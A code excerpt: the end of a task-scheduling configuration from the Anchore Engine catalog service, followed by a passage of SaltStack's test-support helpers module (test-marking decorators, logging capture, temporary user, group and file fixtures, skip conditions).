'last_queued': 0, 'last_return': False, 'initialized': False},
'policy_eval': {'handler': handle_policyeval, 'task_lease_id': 'policy_eval', 'taskType': 'handle_policyeval',
'args': [], 'cycle_timer': 300, 'min_cycle_timer': 60, 'max_cycle_timer': 86400 * 2,
'last_queued': 0, 'last_return': False, 'initialized': False},
'analyzer_queue': {'handler': handle_analyzer_queue, 'task_lease_id': 'analyzer_queue',
'taskType': 'handle_analyzer_queue', 'args': [], 'cycle_timer': 5, 'min_cycle_timer': 1,
'max_cycle_timer': 7200, 'last_queued': 0, 'last_return': False, 'initialized': False},
'notifications': {'handler': handle_notifications, 'task_lease_id': 'notifications',
'taskType': 'handle_notifications', 'args': [], 'cycle_timer': 10, 'min_cycle_timer': 10,
'max_cycle_timer': 86400 * 2, 'last_queued': 0, 'last_return': False, 'initialized': False},
'vulnerability_scan': {'handler': handle_vulnerability_scan, 'task_lease_id': 'vulnerability_scan',
'taskType': 'handle_vulnerability_scan', 'args': [], 'cycle_timer': 300,
'min_cycle_timer': 60, 'max_cycle_timer': 86400 * 2, 'last_queued': 0, 'last_return': False,
'initialized': False},
'account_resource_cleanup': {'handler': handle_account_resource_cleanup, 'task_lease_id': 'account_resource_cleanup',
'taskType': 'handle_account_resource_cleanup', 'args': [], 'cycle_timer': 30,
'min_cycle_timer': 30, 'max_cycle_timer': 30, 'last_queued': 0, 'last_return': False,
'initialized': False},
'service_watcher': {'handler': handle_service_watcher, 'task_lease_id': False, 'taskType': None, 'args': [],
'cycle_timer': 10, 'min_cycle_timer': 1, 'max_cycle_timer': 300, 'last_queued': 0,
'last_return': False, 'initialized': False},
'service_heartbeat': {'handler': anchore_engine.subsys.servicestatus.handle_service_heartbeat,
'task_lease_id': False, 'taskType': None, 'args': [CatalogService.__service_name__],
'cycle_timer': 60, 'min_cycle_timer': 60, 'max_cycle_timer': 60, 'last_queued': 0,
'last_return': False, 'initialized': False},
'handle_metrics': {'handler': handle_metrics, 'task_lease_id': False, 'taskType': None, 'args': [],
'cycle_timer': 60, 'min_cycle_timer': 60, 'max_cycle_timer': 60, 'last_queued': 0,
'last_return': False, 'initialized': False},
'archive_tasks': {'handler': handle_archive_tasks, 'task_lease_id': 'archive_transitions', 'taskType': 'handle_archive_tasks', 'args': [], 'cycle_timer': 43200,
'min_cycle_timer': 60, 'max_cycle_timer': 86400 * 5, 'last_queued': 0, 'last_return': False,
'initialized': False},
}
watcher_task_template = {
'taskType': None,
'watcher': None,
}
watcher_threads = {}
|
helpers.py | """
:copyright: Copyright 2013-2017 by the SaltStack Team, see AUTHORS for more details.
:license: Apache 2.0, see LICENSE for more details.
tests.support.helpers
~~~~~~~~~~~~~~~~~~~~~
Test support helpers
"""
import base64
import errno
import fnmatch
import functools
import inspect
import logging
import os
import random
import shutil
import socket
import string
import subprocess
import sys
import tempfile
import textwrap
import threading
import time
import types
from contextlib import contextmanager
import pytest
import salt.ext.tornado.ioloop
import salt.ext.tornado.web
import salt.utils.files
import salt.utils.platform
import salt.utils.pycrypto
import salt.utils.stringutils
import salt.utils.versions
from salt.ext import six
from salt.ext.six.moves import builtins
from saltfactories.exceptions import FactoryFailure as ProcessFailed
from saltfactories.utils.ports import get_unused_localhost_port
from saltfactories.utils.processes import ProcessResult
from tests.support.mock import patch
from tests.support.runtests import RUNTIME_VARS
from tests.support.sminion import create_sminion
from tests.support.unit import SkipTest, _id, skip
log = logging.getLogger(__name__)
HAS_SYMLINKS = None
PRE_PYTEST_SKIP_OR_NOT = "PRE_PYTEST_DONT_SKIP" not in os.environ
PRE_PYTEST_SKIP_REASON = (
"PRE PYTEST - This test was skipped before running under pytest"
)
PRE_PYTEST_SKIP = pytest.mark.skipif(
PRE_PYTEST_SKIP_OR_NOT, reason=PRE_PYTEST_SKIP_REASON
)
ON_PY35 = sys.version_info < (3, 6)
def no_symlinks():
"""
Check if git is installed and has symlinks enabled in the configuration.
"""
global HAS_SYMLINKS
if HAS_SYMLINKS is not None:
return not HAS_SYMLINKS
output = ""
try:
output = subprocess.Popen(
["git", "config", "--get", "core.symlinks"],
cwd=RUNTIME_VARS.TMP,
stdout=subprocess.PIPE,
).communicate()[0]
except OSError as exc:
if exc.errno != errno.ENOENT:
raise
except subprocess.CalledProcessError:
# git returned non-zero status
pass
HAS_SYMLINKS = False
if output.strip() == "true":
HAS_SYMLINKS = True
return not HAS_SYMLINKS
def destructiveTest(caller):
"""
Mark a test case as a destructive test for example adding or removing users
from your system.
.. code-block:: python
class MyTestCase(TestCase):
@destructiveTest
def test_create_user(self):
pass
"""
setattr(caller, "__destructive_test__", True)
if os.environ.get("DESTRUCTIVE_TESTS", "False").lower() == "false":
reason = "Destructive tests are disabled"
if not isinstance(caller, type):
@functools.wraps(caller)
def skip_wrapper(*args, **kwargs):
raise SkipTest(reason)
caller = skip_wrapper
caller.__unittest_skip__ = True
caller.__unittest_skip_why__ = reason
return caller
def expensiveTest(caller):
"""
Mark a test case as an expensive test, for example, a test which can cost
money(Salt's cloud provider tests).
.. code-block:: python
class MyTestCase(TestCase):
@expensiveTest
def test_create_user(self):
pass
"""
setattr(caller, "__expensive_test__", True)
if os.environ.get("EXPENSIVE_TESTS", "False").lower() == "false":
reason = "Expensive tests are disabled"
if not isinstance(caller, type):
@functools.wraps(caller)
def skip_wrapper(*args, **kwargs):
raise SkipTest(reason)
caller = skip_wrapper
caller.__unittest_skip__ = True
caller.__unittest_skip_why__ = reason
return caller
def slowTest(caller):
"""
Mark a test case as a slow test.
.. code-block:: python
class MyTestCase(TestCase):
@slowTest
def test_that_takes_much_time(self):
pass
"""
setattr(caller, "__slow_test__", True)
return caller
def flaky(caller=None, condition=True, attempts=4):
"""
Mark a test as flaky. The test will attempt to run five times,
looking for a successful run. After an immediate second try,
it will use an exponential backoff starting with one second.
.. code-block:: python
class MyTestCase(TestCase):
@flaky
def test_sometimes_works(self):
pass
"""
if caller is None:
return functools.partial(flaky, condition=condition, attempts=attempts)
if isinstance(condition, bool) and condition is False:
# Don't even decorate
return caller
elif callable(condition):
if condition() is False:
# Don't even decorate
return caller
if inspect.isclass(caller):
attrs = [n for n in dir(caller) if n.startswith("test_")]
for attrname in attrs:
try:
function = getattr(caller, attrname)
if not inspect.isfunction(function) and not inspect.ismethod(function):
continue
setattr(
caller,
attrname,
flaky(caller=function, condition=condition, attempts=attempts),
)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
continue
return caller
@functools.wraps(caller)
def wrap(cls):
for attempt in range(0, attempts):
try:
if attempt > 0:
# Run through setUp again
# We only run it after the first iteration(>0) because the regular
# test runner will have already ran setUp the first time
setup = getattr(cls, "setUp", None)
if callable(setup):
setup()
return caller(cls)
except SkipTest as exc:
cls.skipTest(exc.args[0])
except Exception as exc: # pylint: disable=broad-except
exc_info = sys.exc_info()
if isinstance(exc, SkipTest):
six.reraise(*exc_info)
if not isinstance(exc, AssertionError) and log.isEnabledFor(
logging.DEBUG
):
log.exception(exc, exc_info=exc_info)
if attempt >= attempts - 1:
# We won't try to run tearDown once the attempts are exhausted
# because the regular test runner will do that for us
six.reraise(*exc_info)
# Run through tearDown again
teardown = getattr(cls, "tearDown", None)
if callable(teardown):
teardown()
backoff_time = attempt ** 2
log.info("Found Exception. Waiting %s seconds to retry.", backoff_time)
time.sleep(backoff_time)
return cls
return wrap
def requires_sshd_server(caller):
"""
Mark a test as requiring the tests SSH daemon running.
.. code-block:: python
class MyTestCase(TestCase):
@requiresSshdServer
def test_create_user(self):
pass
"""
raise RuntimeError(
"Please replace @requires_sshd_server with @pytest.mark.requires_sshd_server"
)
class RedirectStdStreams:
"""
Temporarily redirect system output to file like objects.
Default is to redirect to `os.devnull`, which just mutes output, `stdout`
and `stderr`.
"""
def __init__(self, stdout=None, stderr=None):
# Late import
import salt.utils.files
if stdout is None:
# pylint: disable=resource-leakage
stdout = salt.utils.files.fopen(os.devnull, "w")
# pylint: enable=resource-leakage
if stderr is None:
# pylint: disable=resource-leakage
stderr = salt.utils.files.fopen(os.devnull, "w")
# pylint: enable=resource-leakage
self.__stdout = stdout
self.__stderr = stderr
self.__redirected = False
self.patcher = patch.multiple(sys, stderr=self.__stderr, stdout=self.__stdout)
def __enter__(self):
self.redirect()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.unredirect()
def redirect(self):
self.old_stdout = sys.stdout
self.old_stdout.flush()
self.old_stderr = sys.stderr
self.old_stderr.flush()
self.patcher.start()
self.__redirected = True
def unredirect(self):
if not self.__redirected:
return
try:
self.__stdout.flush()
self.__stdout.close()
except ValueError:
# already closed?
pass
try:
self.__stderr.flush()
self.__stderr.close()
except ValueError:
# already closed?
pass
self.patcher.stop()
def flush(self):
if self.__redirected:
try:
self.__stdout.flush()
except Exception: # pylint: disable=broad-except
pass
try:
self.__stderr.flush()
except Exception: # pylint: disable=broad-except
pass
class TstSuiteLoggingHandler:
"""
Simple logging handler which can be used to test if certain logging
messages get emitted or not:
.. code-block:: python
with TstSuiteLoggingHandler() as handler:
# (...) Do what ever you wish here
handler.messages # here are the emitted log messages
"""
def __init__(self, level=0, format="%(levelname)s:%(message)s"):
self.level = level
self.format = format
self.activated = False
self.prev_logging_level = None
def activate(self):
class Handler(logging.Handler):
def __init__(self, level):
logging.Handler.__init__(self, level)
self.messages = []
def emit(self, record):
self.messages.append(self.format(record))
self.handler = Handler(self.level)
formatter = logging.Formatter(self.format)
self.handler.setFormatter(formatter)
logging.root.addHandler(self.handler)
self.activated = True
# Make sure we're running with the lowest logging level with our
# tests logging handler
current_logging_level = logging.root.getEffectiveLevel()
if current_logging_level > logging.DEBUG:
self.prev_logging_level = current_logging_level
logging.root.setLevel(0)
def deactivate(self):
if not self.activated:
return
logging.root.removeHandler(self.handler)
# Restore previous logging level if changed
if self.prev_logging_level is not None:
logging.root.setLevel(self.prev_logging_level)
@property
def messages(self):
if not self.activated:
return []
return self.handler.messages
def clear(self):
self.handler.messages = []
def __enter__(self):
self.activate()
return self
def __exit__(self, type, value, traceback):
self.deactivate()
self.activated = False
# Mimic some handler attributes and methods
@property
def lock(self):
if self.activated:
return self.handler.lock
def createLock(self):
if self.activated:
return self.handler.createLock()
def acquire(self):
if self.activated:
return self.handler.acquire()
def release(self):
if self.activated:
return self.handler.release()
class ForceImportErrorOn:
"""
This class is meant to be used in mock'ed test cases which require an
``ImportError`` to be raised.
>>> import os.path
>>> with ForceImportErrorOn('os.path'):
... import os.path
...
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "salttesting/helpers.py", line 263, in __import__
'Forced ImportError raised for {0!r}'.format(name)
ImportError: Forced ImportError raised for 'os.path'
>>>
>>> with ForceImportErrorOn(('os', 'path')):
... import os.path
... sys.modules.pop('os', None)
... from os import path
...
<module 'os' from '/usr/lib/python2.7/os.pyc'>
Traceback (most recent call last):
File "<stdin>", line 4, in <module>
File "salttesting/helpers.py", line 288, in __fake_import__
name, ', '.join(fromlist)
ImportError: Forced ImportError raised for 'from os import path'
>>>
>>> with ForceImportErrorOn(('os', 'path'), 'os.path'):
... import os.path
... sys.modules.pop('os', None)
... from os import path
...
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "salttesting/helpers.py", line 281, in __fake_import__
'Forced ImportError raised for {0!r}'.format(name)
ImportError: Forced ImportError raised for 'os.path'
>>>
"""
def __init__(self, *module_names):
self.__module_names = {}
for entry in module_names:
if isinstance(entry, (list, tuple)):
modname = entry[0]
self.__module_names[modname] = set(entry[1:])
else:
self.__module_names[entry] = None
self.__original_import = builtins.__import__
self.patcher = patch.object(builtins, "__import__", self.__fake_import__)
def patch_import_function(self):
self.patcher.start()
def restore_import_funtion(self):
self.patcher.stop()
def __fake_import__(
self, name, globals_=None, locals_=None, fromlist=None, level=None
):
if six.PY2:
if globals_ is None:
globals_ = {}
if locals_ is None:
locals_ = {}
if level is None:
level = 0
if fromlist is None:
fromlist = []
if name in self.__module_names:
importerror_fromlist = self.__module_names.get(name)
if importerror_fromlist is None:
raise ImportError("Forced ImportError raised for {!r}".format(name))
if importerror_fromlist.intersection(set(fromlist)):
raise ImportError(
"Forced ImportError raised for {!r}".format(
"from {} import {}".format(name, ", ".join(fromlist))
)
)
return self.__original_import(name, globals_, locals_, fromlist, level)
def __enter__(self):
self.patch_import_function()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.restore_import_funtion()
class MockWraps:
"""
Helper class to be used with the mock library.
To be used in the ``wraps`` keyword of ``Mock`` or ``MagicMock`` where you
want to trigger a side effect for X times, and afterwards, call the
original and un-mocked method.
As an example:
>>> def original():
... print 'original'
...
>>> def side_effect():
... print 'side effect'
...
>>> mw = MockWraps(original, 2, side_effect)
>>> mw()
side effect
>>> mw()
side effect
>>> mw()
original
>>>
"""
def __init__(self, original, expected_failures, side_effect):
self.__original = original
self.__expected_failures = expected_failures
self.__side_effect = side_effect
self.__call_counter = 0
def __call__(self, *args, **kwargs):
try:
if self.__call_counter < self.__expected_failures:
if isinstance(self.__side_effect, types.FunctionType):
return self.__side_effect()
raise self.__side_effect
return self.__original(*args, **kwargs)
finally:
self.__call_counter += 1
def requires_network(only_local_network=False):
"""
Simple decorator which is supposed to skip a test case in case there's no
network connection to the internet.
"""
def decorator(func):
@functools.wraps(func)
def wrapper(cls, *args, **kwargs):
has_local_network = False
# First lets try if we have a local network. Inspired in
# verify_socket
try:
pubsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
retsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
pubsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
pubsock.bind(("", 18000))
pubsock.close()
retsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
retsock.bind(("", 18001))
retsock.close()
has_local_network = True
except OSError:
# I wonder if we just have IPV6 support?
try:
pubsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
retsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
pubsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
pubsock.bind(("", 18000))
pubsock.close()
retsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
retsock.bind(("", 18001))
retsock.close()
has_local_network = True
except OSError:
# Let's continue
pass
if only_local_network is True:
if has_local_network is False:
# Since we're only supposed to check local network, and no
# local network was detected, skip the test
cls.skipTest("No local network was detected")
return func(cls)
if os.environ.get("NO_INTERNET"):
cls.skipTest("Environment variable NO_INTERNET is set.")
# We are using the google.com DNS records as numerical IPs to avoid
# DNS lookups which could greatly slow down this check
for addr in (
"173.194.41.198",
"173.194.41.199",
"173.194.41.200",
"173.194.41.201",
"173.194.41.206",
"173.194.41.192",
"173.194.41.193",
"173.194.41.194",
"173.194.41.195",
"173.194.41.196",
"173.194.41.197",
):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.settimeout(0.25)
sock.connect((addr, 80))
# We connected? Stop the loop
break
except OSError:
# Let's check the next IP
continue
else:
cls.skipTest("No internet network connection was detected")
finally:
sock.close()
return func(cls, *args, **kwargs)
return wrapper
return decorator
def with_system_user(
username, on_existing="delete", delete=True, password=None, groups=None
):
"""
Create and optionally destroy a system user to be used within a test
case. The system user is created using the ``user`` salt module.
The decorated testcase function must accept 'username' as an argument.
:param username: The desired username for the system user.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the user was created.
* delete: delete and re-create the existing user
* skip: skip the test case
"""
if on_existing not in ("nothing", "delete", "skip"):
raise RuntimeError(
"The value of 'on_existing' can only be one of, "
"'nothing', 'delete' and 'skip'"
)
if not isinstance(delete, bool):
raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug("Creating system user {!r}".format(username))
kwargs = {"timeout": 60, "groups": groups}
if salt.utils.platform.is_windows():
kwargs.update({"password": password})
create_user = cls.run_function("user.add", [username], **kwargs)
if not create_user:
log.debug("Failed to create system user")
# The user was not created
if on_existing == "skip":
cls.skipTest("Failed to create system user {!r}".format(username))
if on_existing == "delete":
log.debug("Deleting the system user {!r}".format(username))
delete_user = cls.run_function(
"user.delete", [username, True, True]
)
if not delete_user:
cls.skipTest(
"A user named {!r} already existed on the "
"system and re-creating it was not possible".format(
username
)
)
log.debug("Second time creating system user {!r}".format(username))
create_user = cls.run_function("user.add", [username], **kwargs)
if not create_user:
cls.skipTest(
"A user named {!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
username
)
)
if not salt.utils.platform.is_windows() and password is not None:
if salt.utils.platform.is_darwin():
hashed_password = password
else:
hashed_password = salt.utils.pycrypto.gen_hash(password=password)
hashed_password = "'{}'".format(hashed_password)
add_pwd = cls.run_function(
"shadow.set_password", [username, hashed_password]
)
failure = None
try:
try:
return func(cls, username)
except Exception as exc: # pylint: disable=W0703
log.error(
"Running {!r} raised an exception: {}".format(func, exc),
exc_info=True,
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_user = cls.run_function(
"user.delete", [username, True, True], timeout=60
)
if not delete_user:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system user {!r} "
"afterwards did.".format(username)
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system user {!r}".format(username)
)
if failure is not None:
# If an exception was thrown, raise it
raise failure[1].with_traceback(failure[2])
return wrap
return decorator
def with_system_group(group, on_existing="delete", delete=True):
"""
Create and optionally destroy a system group to be used within a test
case. The system user is crated using the ``group`` salt module.
The decorated testcase function must accept 'group' as an argument.
:param group: The desired group name for the system user.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the group was created
* delete: delete and re-create the existing user
* skip: skip the test case
"""
if on_existing not in ("nothing", "delete", "skip"):
raise RuntimeError(
"The value of 'on_existing' can only be one of, "
"'nothing', 'delete' and 'skip'"
)
if not isinstance(delete, bool):
raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug("Creating system group {!r}".format(group))
create_group = cls.run_function("group.add", [group])
if not create_group:
log.debug("Failed to create system group")
# The group was not created
if on_existing == "skip":
cls.skipTest("Failed to create system group {!r}".format(group))
if on_existing == "delete":
log.debug("Deleting the system group {!r}".format(group))
delete_group = cls.run_function("group.delete", [group])
if not delete_group:
cls.skipTest(
"A group named {!r} already existed on the "
"system and re-creating it was not possible".format(group)
)
log.debug("Second time creating system group {!r}".format(group))
create_group = cls.run_function("group.add", [group])
if not create_group:
cls.skipTest(
"A group named {!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
group
)
)
failure = None
try:
try:
return func(cls, group)
except Exception as exc: # pylint: disable=W0703
log.error(
"Running {!r} raised an exception: {}".format(func, exc),
exc_info=True,
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_group = cls.run_function("group.delete", [group])
if not delete_group:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system group {!r} "
"afterwards did.".format(group)
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system group {!r}".format(group)
)
if failure is not None:
# If an exception was thrown, raise it
raise failure[1].with_traceback(failure[2])
return wrap
return decorator
def with_system_user_and_group(username, group, on_existing="delete", delete=True):
"""
Create and optionally destroy a system user and group to be used within a
test case. The system user is crated using the ``user`` salt module, and
the system group is created with the ``group`` salt module.
The decorated testcase function must accept both the 'username' and 'group'
arguments.
:param username: The desired username for the system user.
:param group: The desired name for the system group.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the user was created.
* delete: delete and re-create the existing user
* skip: skip the test case
"""
if on_existing not in ("nothing", "delete", "skip"):
raise RuntimeError(
"The value of 'on_existing' can only be one of, "
"'nothing', 'delete' and 'skip'"
)
if not isinstance(delete, bool):
raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug("Creating system user {!r}".format(username))
create_user = cls.run_function("user.add", [username])
log.debug("Creating system group {!r}".format(group))
create_group = cls.run_function("group.add", [group])
if not create_user:
log.debug("Failed to create system user")
# The user was not created
if on_existing == "skip":
cls.skipTest("Failed to create system user {!r}".format(username))
if on_existing == "delete":
log.debug("Deleting the system user {!r}".format(username))
delete_user = cls.run_function(
"user.delete", [username, True, True]
)
if not delete_user:
cls.skipTest(
"A user named {!r} already existed on the "
"system and re-creating it was not possible".format(
username
)
)
log.debug("Second time creating system user {!r}".format(username))
create_user = cls.run_function("user.add", [username])
if not create_user:
cls.skipTest(
"A user named {!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
username
)
)
if not create_group:
log.debug("Failed to create system group")
# The group was not created
if on_existing == "skip":
cls.skipTest("Failed to create system group {!r}".format(group))
if on_existing == "delete":
log.debug("Deleting the system group {!r}".format(group))
delete_group = cls.run_function("group.delete", [group])
if not delete_group:
cls.skipTest(
"A group named {!r} already existed on the "
"system and re-creating it was not possible".format(group)
)
log.debug("Second time creating system group {!r}".format(group))
create_group = cls.run_function("group.add", [group])
if not create_group:
cls.skipTest(
"A group named {!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
group
)
)
failure = None
try:
try:
return func(cls, username, group)
except Exception as exc: # pylint: disable=W0703
log.error(
"Running {!r} raised an exception: {}".format(func, exc),
exc_info=True,
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_user = cls.run_function(
"user.delete", [username, True, True]
)
delete_group = cls.run_function("group.delete", [group])
if not delete_user:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system user {!r} "
"afterwards did.".format(username)
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system user {!r}".format(username)
)
if not delete_group:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system group {!r} "
"afterwards did.".format(group)
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system group {!r}".format(group)
)
if failure is not None:
# If an exception was thrown, raise it
raise failure[1].with_traceback(failure[2])
return wrap
return decorator
class WithTempfile:
def __init__(self, **kwargs):
self.create = kwargs.pop("create", True)
if "dir" not in kwargs:
kwargs["dir"] = RUNTIME_VARS.TMP
if "prefix" not in kwargs:
kwargs["prefix"] = "__salt.test."
self.kwargs = kwargs
def __call__(self, func):
self.func = func
return functools.wraps(func)(
# pylint: disable=unnecessary-lambda
lambda testcase, *args, **kwargs: self.wrap(testcase, *args, **kwargs)
# pylint: enable=unnecessary-lambda
)
def wrap(self, testcase, *args, **kwargs):
name = salt.utils.files.mkstemp(**self.kwargs)
if not self.create:
os.remove(name)
try:
return self.func(testcase, name, *args, **kwargs)
finally:
try:
os.remove(name)
except OSError:
pass
with_tempfile = WithTempfile
class WithTempdir:
def __init__(self, **kwargs):
self.create = kwargs.pop("create", True)
if "dir" not in kwargs:
kwargs["dir"] = RUNTIME_VARS.TMP
self.kwargs = kwargs
def __call__(self, func):
self.func = func
return functools.wraps(func)(
# pylint: disable=unnecessary-lambda
lambda testcase, *args, **kwargs: self.wrap(testcase, *args, **kwargs)
# pylint: enable=unnecessary-lambda
)
def wrap(self, testcase, *args, **kwargs):
tempdir = tempfile.mkdtemp(**self.kwargs)
if not self.create:
os.rmdir(tempdir)
try:
return self.func(testcase, tempdir, *args, **kwargs)
finally:
shutil.rmtree(tempdir, ignore_errors=True)
with_tempdir = WithTempdir
def requires_system_grains(func):
"""
Function decorator which loads and passes the system's grains to the test
case.
"""
@functools.wraps(func)
def decorator(*args, **kwargs):
if not hasattr(requires_system_grains, "__grains__"):
# Late import
from tests.support.sminion import build_minion_opts
opts = build_minion_opts(minion_id="runtests-internal-sminion")
requires_system_grains.__grains__ = salt.loader.grains(opts)
kwargs["grains"] = requires_system_grains.__grains__
return func(*args, **kwargs)
return decorator
@requires_system_grains
def runs_on(grains=None, **kwargs):
"""
Skip the test if grains don't match the values passed into **kwargs
if a kwarg value is a list then skip if the grains don't match any item in the list
"""
reason = kwargs.pop("reason", None)
for kw, value in kwargs.items():
if isinstance(value, list):
if not any(str(grains.get(kw)).lower() != str(v).lower() for v in value):
if reason is None:
reason = "This test does not run on {}={}".format(
kw, grains.get(kw)
)
return skip(reason)
else:
if str(grains.get(kw)).lower() != str(value).lower():
if reason is None:
reason = "This test runs on {}={}, not {}".format(
kw, value, grains.get(kw)
)
return skip(reason)
return _id
@requires_system_grains
def not_runs_on(grains=None, **kwargs):
"""
Reverse of `runs_on`.
Skip the test if any grains match the values passed into **kwargs
if a kwarg value is a list then skip if the grains match any item in the list
"""
reason = kwargs.pop("reason", None)
for kw, value in kwargs.items():
if isinstance(value, list):
if any(str(grains.get(kw)).lower() == str(v).lower() for v in value):
if reason is None:
reason = "This test does not run on {}={}".format(
kw, grains.get(kw)
)
return skip(reason)
else:
if str(grains.get(kw)).lower() == str(value).lower():
if reason is None:
reason = "This test does not run on {}={}, got {}".format(
kw, value, grains.get(kw)
)
return skip(reason)
return _id
def _check_required_sminion_attributes(sminion_attr, *required_items):
"""
:param sminion_attr: The name of the sminion attribute to check, such as 'functions' or 'states'
:param required_items: The items that must be part of the designated sminion attribute for the decorated test
:return The packages that are not available
"""
# Late import
from tests.support.sminion import create_sminion
required_salt_items = set(required_items)
sminion = create_sminion(minion_id="runtests-internal-sminion")
available_items = list(getattr(sminion, sminion_attr))
not_available_items = set()
name = "__not_available_{items}s__".format(items=sminion_attr)
if not hasattr(sminion, name):
setattr(sminion, name, set())
cached_not_available_items = getattr(sminion, name)
for not_available_item in cached_not_available_items:
if not_available_item in required_salt_items:
not_available_items.add(not_available_item)
required_salt_items.remove(not_available_item)
for required_item_name in required_salt_items:
search_name = required_item_name
if "." not in search_name:
search_name += ".*"
if not fnmatch.filter(available_items, search_name):
not_available_items.add(required_item_name)
cached_not_available_items.add(required_item_name)
return not_available_items
def requires_salt_states(*names):
"""
Makes sure the passed salt state is available. Skips the test if not
.. versionadded:: 3000
"""
not_available = _check_required_sminion_attributes("states", *names)
if not_available:
return skip("Unavailable salt states: {}".format(*not_available))
return _id
def requires_salt_modules(*names):
"""
Makes sure the passed salt module is available. Skips the test if not
.. versionadded:: 0.5.2
"""
not_available = _check_required_sminion_attributes("functions", *names)
if not_available:
return skip("Unavailable salt modules: {}".format(*not_available))
return _id
def skip_if_binaries_missing(*binaries, **kwargs):
import salt.utils.path
if len(binaries) == 1:
if isinstance(binaries[0], (list, tuple, set, frozenset)):
binaries = binaries[0]
check_all = kwargs.pop("check_all", False)
message = kwargs.pop("message", None)
if kwargs:
raise RuntimeError(
"The only supported keyword argument is 'check_all' and "
"'message'. Invalid keyword arguments: {}".format(", ".join(kwargs.keys()))
)
if check_all:
for binary in binaries:
if salt.utils.path.which(binary) is None:
return skip(
"{}The {!r} binary was not found".format(
message and "{}. ".format(message) or "", binary
)
)
elif salt.utils.path.which_bin(binaries) is None:
return skip(
"{}None of the following binaries was found: {}".format(
message and "{}. ".format(message) or "", ", ".join(binaries)
)
)
return _id
def skip_if_not_root(func):
setattr(func, "__skip_if_not_root__", True)
if not sys.platform.startswith("win"):
if os.getuid() != 0:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = (
"You must be logged in as root to run this test"
)
else:
current_user = salt.utils.win_functions.get_current_user()
if current_user != "SYSTEM":
if not salt.utils.win_functions.is_admin(current_user):
func.__unittest_skip__ = True
func.__unittest_skip_why__ = (
"You must be logged in as an Administrator to run this test"
)
return func
def repeat(caller=None, condition=True, times=5):
"""
Repeat a test X amount of times until the first failure.
.. code-block:: python
class MyTestCase(TestCase):
@repeat
def test_sometimes_works(self):
pass
"""
if caller is None:
return functools.partial(repeat, condition=condition, times=times)
if isinstance(condition, bool) and condition is False:
# Don't even decorate
return caller
elif callable(condition):
if condition() is False:
# Don't even decorate
return caller
if inspect.isclass(caller):
attrs = [n for n in dir(caller) if n.startswith("test_")]
for attrname in attrs:
try:
function = getattr(caller, attrname)
if not inspect.isfunction(function) and not inspect.ismethod(function):
continue
setattr(
caller,
attrname,
repeat(caller=function, condition=condition, times=times),
)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
continue
return caller
@functools.wraps(caller)
def wrap(cls):
result = None
for attempt in range(1, times + 1):
log.info("%s test run %d of %s times", cls, attempt, times)
caller(cls)
return cls
return wrap
def http_basic_auth(login_cb=lambda username, password: False):
"""
A crude decorator to force a handler to request HTTP Basic Authentication
Example usage:
.. code-block:: python
@http_basic_auth(lambda u, p: u == 'foo' and p == 'bar')
class AuthenticatedHandler(salt.ext.tornado.web.RequestHandler):
pass
"""
def wrapper(handler_class):
def wrap_execute(handler_execute):
def check_auth(handler, kwargs):
auth = handler.request.headers.get("Authorization")
if auth is None or not auth.startswith("Basic "):
# No username/password entered yet, we need to return a 401
# and set the WWW-Authenticate header to request login.
handler.set_status(401)
handler.set_header("WWW-Authenticate", "Basic realm=Restricted")
else:
# Strip the 'Basic ' from the beginning of the auth header
# leaving the base64-encoded secret
username, password = base64.b64decode(auth[6:]).split(":", 1)
if login_cb(username, password):
# Authentication successful
return
else:
# Authentication failed
handler.set_status(403)
handler._transforms = []
handler.finish()
def _execute(self, transforms, *args, **kwargs):
check_auth(self, kwargs)
return handler_execute(self, transforms, *args, **kwargs)
return _execute
handler_class._execute = wrap_execute(handler_class._execute)
return handler_class
return wrapper
def generate_random_name(prefix, size=6):
"""
Generates a random name by combining the provided prefix with a randomly generated
ascii string.
.. versionadded:: 2018.3.0
prefix
The string to prefix onto the randomly generated ascii string.
size
The number of characters to generate. Default: 6.
"""
salt.utils.versions.warn_until_date(
"20220101",
"Please replace your call 'generate_random_name({0})' with 'random_string({0}, lowercase=False)' as "
